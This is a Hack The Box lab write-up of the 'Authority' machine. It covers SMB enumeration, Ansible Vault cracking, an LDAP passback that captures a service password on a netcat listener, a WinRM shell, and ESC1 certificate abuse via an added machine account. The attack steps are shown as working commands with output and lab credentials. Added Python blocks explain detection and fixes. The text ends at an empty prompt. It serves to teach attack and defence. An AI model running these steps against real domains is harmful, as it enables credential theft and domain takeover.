
Saturday, January 27, 2024

HTB: Authority

This is my very first HTB write-up, so we'll see how it goes.  Please leave a comment if you have any feedback or suggestions.

I really liked this box.  I thought it was fun and I learned a few things along the way.  I pwned this machine last July but couldn't post this because it was still active and then forgot about it.  LoL



Recon

nmap

nmap shows we are dealing with a Windows system that appears to be a Domain Controller.  Based on the name of the box, I'm betting it's also a Certificate Authority.  😉

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ nmap -T4 -p- -A 10.129.145.117 -Pn  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-30 17:06 CDT
Warning: 10.129.145.117 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.145.117
Host is up (0.053s latency).
Not shown: 65497 closed tcp ports (conn-refused)
PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-31 02:17:58Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::[email protected], DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2023-07-31T02:18:57+00:00; +4h00m00s from scanner time.
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-31T02:18:57+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::[email protected], DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-31T02:18:57+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::[email protected], DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::[email protected], DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2023-07-31T02:18:57+00:00; +4h00m00s from scanner time.
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6934/tcp  filtered unknown
8443/tcp  open     ssl/https-alt
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2023-07-29T01:14:56
|_Not valid after:  2025-07-30T12:53:20
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/html;charset=ISO-8859-1
|     Content-Length: 82
|     Date: Mon, 31 Jul 2023 02:18:04 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET, HEAD, POST, OPTIONS
|     Content-Length: 0
|     Date: Mon, 31 Jul 2023 02:18:04 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1936
|     Date: Mon, 31 Jul 2023 02:18:10 GMT
|     Connection: close
9389/tcp  open     mc-nmf        .NET Message Framing
11702/tcp filtered unknown
12076/tcp filtered unknown
13747/tcp filtered unknown
17718/tcp filtered unknown
28638/tcp filtered unknown
34771/tcp filtered unknown
35404/tcp filtered unknown
36253/tcp filtered unknown
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49669/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open     msrpc         Microsoft Windows RPC
49675/tcp open     msrpc         Microsoft Windows RPC
49678/tcp open     msrpc         Microsoft Windows RPC
49687/tcp open     msrpc         Microsoft Windows RPC
49695/tcp open     msrpc         Microsoft Windows RPC
49704/tcp open     msrpc         Microsoft Windows RPC
50919/tcp open     msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-07-31T02:18:51
|_  start_date: N/A
|_clock-skew: mean: 4h00m00s, deviation: 0s, median: 3h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 746.91 seconds


IIS

I take a quick peek at IIS, but it's just the default start page.  I make note that I may need to use gobuster later.

SMB

Enumeration

smbmap doesn't give me much at first, but with a bad username, I get a guest session.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ smbmap -H 10.129.145.117                        
[+] IP: 10.129.145.117:445      Name: authority                                         
                                                                                                                                                            
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ smbmap -H 10.129.145.117 -u 'N1nja'
[+] Guest session       IP: 10.129.145.117:445  Name: authority                                         
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        Department Shares                                       NO ACCESS
        Development                                             READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 

I download the contents of the Development share with smbclient.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ smbclient '\\10.129.145.117\Development' -N -c 'prompt OFF; recurse ON; mget *'
getting file \Automation\Ansible\ADCS\.ansible-lint of size 259 as Automation/Ansible/ADCS/.ansible-lint (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\.yamllint of size 205 as Automation/Ansible/ADCS/.yamllint (0.9 KiloBytes/sec) (average 1.1 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\LICENSE of size 11364 as Automation/Ansible/ADCS/LICENSE (52.1 KiloBytes/sec) (average 18.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\README.md of size 7279 as Automation/Ansible/ADCS/README.md (33.7 KiloBytes/sec) (average 22.0 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\requirements.txt of size 466 as Automation/Ansible/ADCS/requirements.txt (2.2 KiloBytes/sec) (average 18.1 KiloBytes/sec)
...snip  


Ansible Vault

I found a couple of usernames and passwords, but none of them turned out to be helpful.  I did find some interesting data encrypted with Ansible Vault though.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ cat Automation/Ansible/PWM/defaults/main.yml
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          32666534386435366537653136663731633138616264323230383566333966346662313161326239
          6134353663663462373265633832356663356239383039640a346431373431666433343434366139
          35653634376333666234613466396534343030656165396464323564373334616262613439343033
          6334326263326364380a653034313733326639323433626130343834663538326439636232306531
          3438

pwm_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          31356338343963323063373435363261323563393235633365356134616261666433393263373736
          3335616263326464633832376261306131303337653964350a363663623132353136346631396662
          38656432323830393339336231373637303535613636646561653637386634613862316638353530
          3930356637306461350a316466663037303037653761323565343338653934646533663365363035
          6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          63303831303534303266356462373731393561313363313038376166336536666232626461653630
          3437333035366235613437373733316635313530326639330a643034623530623439616136363563
          34646237336164356438383034623462323531316333623135383134656263663266653938333334
          3238343230333633350a646664396565633037333431626163306531336336326665316430613566
          3764  

I've never really used Ansible, so I didn't know much about Ansible Vault and had to do some searching.

I put each of those vault strings into their own file.


┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ cat pwm_admin.vault 
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
                                                                                                                                                            
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ cat pwm_pass.vault 
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
                                                                                                                                                            
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ cat ldap.vault    
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764


I then used ansible2john to convert each vault string to a hash so that I could use john to try to crack it.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ ansible2john pwm_admin.vault > pwm_admin.hash
                                                                                                                                                            
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ cat pwm_admin.hash   
pwm_admin.vault:$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8
                                                                                                                                                            
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ john pwm_admin.hash                         
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 256/256 AVX2 8x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
!@#$%^&*         (pwm_admin.vault)     
1g 0:00:00:29 DONE 2/3 (2023-07-30 18:09) 0.03334g/s 868.5p/s 868.5c/s 868.5C/s !@#$%..Gretel
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


This is where my "skimming" hurt me.  I did the above for all 3 files and got "!@#$%^&*" back for each of them.  I thought something was wrong and went back to enumerating the rest of the files for a while.  Once I didn't find anything useful, I came back to this and, upon reading fully, learned that john was just cracking the vault password, not the vault string itself.

Having that additional bit of knowledge, I used ansible-vault to view the encrypted data.


┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ ansible-vault view pwm_admin.vault            
Vault password: 
svc_pwm
                                                                                                                                                            
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ ansible-vault view pwm_pass.vault 
Vault password: 
pWm_@dm!N_!23
                                                                                                                                                            
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ ansible-vault view ldap.vault    
Vault password: 
DevT3st@123


Only one of these actually turned out to be useful.
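To make the "john cracks the vault password, not the contents" point concrete, here is an added Python example (mine, not the author's, and not Ansible's or john's code) that parses the pwm_admin_login envelope from the share into the three fields ansible2john emits, and checks a candidate passphrase against the stored HMAC the same way Ansible and john do: derive keys with PBKDF2-HMAC-SHA256 and recompute the tag, with no decryption at all.  Only the standard library is used; the PBKDF2 parameters are Ansible's VaultAES256 constants (the 10000 iterations match john's "Cost 1" line above).

```python
import hashlib
import hmac
from binascii import unhexlify

# Sample input: the pwm_admin_login blob from the Development share, copied from the write-up.
PWM_ADMIN_VAULT = """\
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
"""

# Constants fixed by Ansible's VaultAES256 implementation.
PBKDF2_ITERATIONS = 10000
KEY_LEN = 32      # AES-256 key and HMAC-SHA256 key, 32 bytes each
IV_LEN = 16       # AES-CTR IV
AES_BLOCK = 16    # plaintext is PKCS7-padded to this before CTR encryption


def parse_vault(blob: str) -> dict:
    """Split a $ANSIBLE_VAULT;1.1;AES256 envelope into its hex fields.

    The body is hex text; decoding it once yields 'salt\\nhmac\\nciphertext',
    each of which is hex again.  These are the three fields ansible2john
    writes as $ansible$0*0*salt*ciphertext*hmac.
    """
    lines = [ln.strip() for ln in blob.strip().splitlines()]
    header = lines[0].split(";")
    if header[0] != "$ANSIBLE_VAULT" or header[2] != "AES256":
        raise ValueError("not an AES256 Ansible Vault envelope: %r" % lines[0])
    inner = unhexlify("".join(lines[1:])).decode("ascii")
    salt_hex, hmac_hex, ct_hex = inner.split("\n")
    return {
        "version": header[1],
        "vault_id": header[3] if len(header) > 3 else None,
        "salt": salt_hex,
        "hmac": hmac_hex,
        "ciphertext": ct_hex,
    }


def check_vault_password(blob: str, password: str) -> bool:
    """True if `password` opens the vault, decided from the HMAC alone.

    Ansible derives key1 (AES) || key2 (HMAC) || iv with PBKDF2 and stores
    HMAC-SHA256(key2, ciphertext).  Recomputing that tag confirms a passphrase
    without touching the plaintext, which is exactly why john reports the
    vault password and never the secret.
    """
    v = parse_vault(blob)
    derived = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), unhexlify(v["salt"]),
        PBKDF2_ITERATIONS, dklen=2 * KEY_LEN + IV_LEN)
    key2 = derived[KEY_LEN:2 * KEY_LEN]
    tag = hmac.new(key2, unhexlify(v["ciphertext"]), "sha256").digest()
    return hmac.compare_digest(tag, unhexlify(v["hmac"]))


def plaintext_length_bound(blob: str) -> int:
    """Upper bound on the secret's length leaked by the ciphertext size.

    PKCS7 padding always adds at least one byte, so a 16-byte ciphertext
    holds at most 15 bytes of plaintext ("svc_pwm" is 7).
    """
    ct = unhexlify(parse_vault(blob)["ciphertext"])
    if len(ct) % AES_BLOCK:
        raise ValueError("ciphertext is not block aligned")
    return len(ct) - 1


if __name__ == "__main__":
    fields = parse_vault(PWM_ADMIN_VAULT)
    print("salt      :", fields["salt"])
    print("hmac      :", fields["hmac"])
    print("ciphertext:", fields["ciphertext"])
    print("plaintext is at most %d bytes" % plaintext_length_bound(PWM_ADMIN_VAULT))
```

The defender's takeaway is that a vault is exactly as strong as its passphrase: the envelope is not secret, the KDF cost is fixed, and a passphrase that sits in john's default wordlist turns a vault on a guest-readable share into plaintext.  The size bound is a smaller leak, but it is still there before any cracking happens.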

PWM

When browsing to https://10.129.145.117:8443, I get a certificate warning as expected.  I accept the risk and continue.  I also make note that I may need to add the cert to my local trust store.



I'm then brought to a Password Self-Service site and given a notice that it's in configuration mode.



I'm also greeted with a logon page.



I tried signing in with the credentials found from ansible vault, but was greeted with an error message about LDAP being unavailable.  I tried the Configuration Manager and Configuration Editor buttons and was taken to a page to enter a Configuration Password.



I used the pwm_admin_password from the ansible vault and I'm in.  I search around the configuration a bit and I see an LDAP URL and an LDAP Proxy User setting.  Unfortunately, it doesn't show us the LDAP Proxy Password value.



Shell as svc_ldap

Passback Attack

I add a new LDAP URL with my attacker IP address, fire up a netcat listener, and test the LDAP profile.



Voilà!  We have a password for the svc_ldap account.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ nc -lvp 389                                           
listening on [any] 389 ...
10.129.145.117: inverse host lookup failed: Unknown host
connect to [10.10.14.83] from (UNKNOWN) [10.129.145.117] 60247
0Y`T;CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb�lDaP_1n_th3_cle4r!0P
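The garbled line netcat printed is a raw LDAPv3 simple BindRequest: `0Y` is the outer SEQUENCE with length 0x59, `` `T `` the BindRequest (tag 0x60) with length 0x54, `;` the 59-byte DN length, and the unprintable byte before the password is the simple-authentication tag 0x80.  The following added Python example (mine, not the author's and not PWM's code) rebuilds that message from the DN and password shown above, decodes it with a minimal BER reader, and raises the finding a network sensor should raise: a simple bind carrying a password on a non-TLS connection.  The destination port and TLS flag passed to the detector are constructed inputs, not values the write-up reports.

```python
# Constructed sample: same DN and password as the captured bind, so the
# encoded bytes begin with "0Y" and "`T;CN=svc_ldap" just like the listener output.
DN = b"CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb"
PASSWORD = b"lDaP_1n_th3_cle4r!"


def _tlv(tag: int, payload: bytes) -> bytes:
    """BER short-form TLV (payload under 128 bytes, enough for this message)."""
    if len(payload) >= 128:
        raise ValueError("short-form length only")
    return bytes([tag, len(payload)]) + payload


def build_simple_bind(message_id: int, dn: bytes, password: bytes) -> bytes:
    """LDAPMessage { messageID, BindRequest { version 3, name, simple password } }."""
    bind = _tlv(0x60, _tlv(0x02, b"\x03") + _tlv(0x04, dn) + _tlv(0x80, password))
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + bind)


SAMPLE_BIND = build_simple_bind(1, DN, PASSWORD)


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos); handles short- and long-form lengths."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_ldap_message(buf: bytes) -> dict:
    """Decode the outer LDAPMessage; only BindRequest is decoded in detail."""
    tag, body, _ = _read_tlv(buf, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, msgid, pos = _read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    op_tag, op, _ = _read_tlv(body, pos)
    msg = {"message_id": int.from_bytes(msgid, "big"), "op": "0x%02x" % op_tag}
    if op_tag != 0x60:
        return msg
    _, ver, pos = _read_tlv(op, 0)
    _, name, pos = _read_tlv(op, pos)
    auth_tag, cred, _ = _read_tlv(op, pos)     # [0] simple = 0x80, [3] sasl = 0xA3
    msg.update(
        op="bindRequest",
        version=int.from_bytes(ver, "big"),
        name=name.decode("utf-8", "replace"),
        auth={0x80: "simple", 0xA3: "sasl"}.get(auth_tag, "unknown"),
        credential_length=len(cred) if auth_tag == 0x80 else None,
    )
    return msg


def cleartext_bind_finding(msg: dict, dst_port: int, tls: bool):
    """Finding text for a password-bearing simple bind without TLS, else None.

    The password itself is deliberately not included in the finding; only
    its length is reported so the alert does not become a second leak.
    """
    if msg.get("op") != "bindRequest" or msg.get("auth") != "simple":
        return None
    if tls or not msg.get("credential_length"):   # LDAPS/StartTLS, or anonymous bind
        return None
    return "cleartext simple bind to port %d as %s (%d-byte password exposed)" % (
        dst_port, msg["name"], msg["credential_length"])


if __name__ == "__main__":
    parsed = parse_ldap_message(SAMPLE_BIND)
    print(parsed)
    print(cleartext_bind_finding(parsed, 389, tls=False))
```

The fix on the PWM side is the one the author's screenshots hint at: the LDAP profile should point at an ldaps:// URL (or require StartTLS), and the configuration password that unlocks the editor deserves the same protection as the proxy credential, because whoever can edit the URL can redirect the bind.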


WinRM Shell

I wasn't sure whether that user could, but I always try for a WinRM shell when I get new creds.  It works and we get the user flag.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ evil-winrm -i 10.129.145.117 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'             
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> cat ..\Desktop\user.txt
e8dd...snip


Privilege Escalation

whoami shows us which privileges our user has.

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We have SeMachineAccountPrivilege.  This is important, and I overlooked it when doing the box.  It will come into play later.

As anticipated, this box is also a Certificate Authority.  I had to do some research on CA vulnerabilities because while I know "about" them, I've never actually exploited one.  AD CS Domain Escalation - HackTricks is a pretty good reference.

We use certipy-ad to see if there are any vulnerable Certificate Templates.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ certipy-ad find -dc-ip 10.129.145.117 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -vulnerable -stdout
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : AUTHORITY-CA
    DNS Name                            : authority.authority.htb
    Certificate Subject                 : CN=AUTHORITY-CA, DC=authority, DC=htb
    Certificate Serial Number           : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
    Certificate Validity Start          : 2023-04-24 01:46:26+00:00
    Certificate Validity End            : 2123-04-24 01:56:25+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : AUTHORITY.HTB\Administrators
      Access Rights
        ManageCa                        : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        ManageCertificates              : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Enroll                          : AUTHORITY.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollmentCheckUserDsCertificate
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
                                          Document Signing
                                          IP security IKE intermediate
                                          IP security use
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 20 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : AUTHORITY.HTB\Administrator
        Write Owner Principals          : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
        Write Dacl Principals           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
        Write Property Principals       : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

We see that the CorpVPN template is vulnerable to ESC1, but my user doesn't have Enrollment Rights.  This is where I fell into a rabbit hole because of overlooking the SeMachineAccountPrivilege.  I spent an hour or two continuing to enumerate and dive deeper into the rabbit hole until I took a break.  Not 5 minutes after I stepped away, it hit me right in the face and I felt like such a fool.  Domain Computers has enrollment rights, and I have a privilege that lets me create domain computers.  I ran back to my office.
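The following added Python example (mine, not the author's and not certipy's code) encodes the ESC1 conditions certipy reported against the CorpVPN attributes printed above, and adds the check the author initially missed: an enrollment right granted to Domain Computers is reachable by any authenticated user as long as ms-DS-MachineAccountQuota is above zero and the user holds SeMachineAccountPrivilege.  The template dictionary is constructed from the certipy output on this page; the quota default of 10 is Active Directory's default value, not a number read from this box.

```python
from typing import Dict, List

# Principals every domain user is effectively a member of, or can obtain membership of.
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}
# EKUs that make an issued certificate usable for domain logon.
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}

# Constructed input mirroring the CorpVPN template as certipy printed it above.
CORP_VPN: Dict = {
    "name": "CorpVPN",
    "enabled": True,
    "enrollee_supplies_subject": True,
    "extended_key_usage": [
        "Encrypting File System", "Secure Email", "Client Authentication",
        "Document Signing", "IP security IKE intermediate", "IP security use",
        "KDC Authentication",
    ],
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "enrollment_rights": [
        "AUTHORITY.HTB\\Domain Computers",
        "AUTHORITY.HTB\\Domain Admins",
        "AUTHORITY.HTB\\Enterprise Admins",
    ],
}


def _short(principal: str) -> str:
    """'AUTHORITY.HTB\\Domain Computers' -> 'Domain Computers'."""
    return principal.split("\\")[-1]


def assess_esc1(template: Dict, machine_account_quota: int = 10) -> Dict:
    """Evaluate one template for ESC1 and say who can actually reach it.

    machine_account_quota defaults to 10, the AD default for
    ms-DS-MachineAccountQuota; pass the value read from the domain root.
    """
    result = {
        "template": template["name"],
        "esc1": False,
        "low_priv_enrollers": [],
        "reachable_by_any_authenticated_user": False,
        "notes": [],
    }
    ekus = set(template.get("extended_key_usage", []))
    # An empty EKU list means "all purposes", which also allows logon.
    checks = [
        (template.get("enabled", False), "template is not enabled"),
        (template.get("enrollee_supplies_subject", False),
         "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT is not set"),
        (not ekus or bool(ekus & AUTH_EKUS), "no authentication EKU"),
        (not template.get("requires_manager_approval", False), "manager approval required"),
        (template.get("authorized_signatures_required", 0) == 0,
         "authorized signatures required"),
    ]
    failed: List[str] = [why for ok, why in checks if not ok]
    low = [_short(p) for p in template.get("enrollment_rights", [])
           if _short(p) in LOW_PRIV_PRINCIPALS]
    if not low:
        failed.append("no low-privileged principal has enrollment rights")
    result["low_priv_enrollers"] = low
    result["notes"] = failed
    if failed:
        return result

    result["esc1"] = True
    direct = set(low) - {"Domain Computers"}
    if direct:
        result["reachable_by_any_authenticated_user"] = True
        result["notes"].append("direct enrollment by %s" % ", ".join(sorted(direct)))
    elif machine_account_quota > 0:
        # Exactly the CorpVPN situation: no user principal, but any user holding
        # SeMachineAccountPrivilege can add a computer while the quota is above 0.
        result["reachable_by_any_authenticated_user"] = True
        result["notes"].append(
            "Domain Computers can enroll and ms-DS-MachineAccountQuota=%d lets any user "
            "with SeMachineAccountPrivilege create one" % machine_account_quota)
    else:
        result["notes"].append("only existing computer accounts can enroll (quota is 0)")
    return result


if __name__ == "__main__":
    for quota in (10, 0):
        print(assess_esc1(CORP_VPN, machine_account_quota=quota))
```

The two cheapest fixes fall straight out of the checks: setting ms-DS-MachineAccountQuota to 0 closes the "anyone can become a computer" path without touching the template, and either clearing EnrolleeSuppliesSubject or turning on manager approval for CorpVPN removes the ESC1 condition itself.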

We use impacket-addcomputer to create a new computer object.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ impacket-addcomputer -computer-name 'N1NJA$' -computer-pass 'N1njaPass!' -dc-host 10.129.145.117 authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Successfully added machine account N1NJA$ with password N1njaPass!.

We can then use certipy-ad again to request a certificate using our newly created computer object.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ certipy-ad req -u 'N1NJA$' -p 'N1njaPass!' -ca AUTHORITY-CA -dc-ip 10.129.145.117 -template CorpVPN -upn [email protected]
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

And now we have a certificate with a subjectAltName of [email protected].  Unfortunately, we can't authenticate with that certificate because the Domain Controller doesn't seem to support PKINIT.

┌──(kali㉿kalivm)-[~/htb/Authority]
